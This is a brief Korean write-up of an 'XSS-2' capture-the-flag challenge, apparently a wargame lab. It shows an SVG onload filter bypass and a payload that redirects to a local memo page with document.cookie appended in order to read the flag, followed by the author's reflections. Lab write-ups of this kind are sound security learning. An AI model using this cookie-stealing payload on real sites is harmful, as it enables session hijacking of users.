XSS-2

• 위 페이지 URL에서 alert 스크립트가 동작하지 않는 것을 미루어 보아 XSS 방지를 위한 필터링 코드가 동작하는 것이라 유추할 수 있다
• 따라서 필터링을 우회하기 위해 <svg/onload="alert(1)"> 을 파라미터로 입력하였고 스크립트가 동작하는 것을 확인

• /flag 페이지에서 임의의 사용자의 쿠키를 받아오기 위해 아래의 스크립트를 삽입한다

<svg/onload=location["href"]="http://127.0.0.1:8000/memo?memo="+document["cookie"]>

• 그 후 /memo 페이지에서 플래그를 확인할 수 있다

✅우회 기법을 적용하는 것은 알 수 있었지만 우회 코드는 검색을 해야 했다
✅그리고 app.py 코드를 분석하는 실력이 더 필요할 듯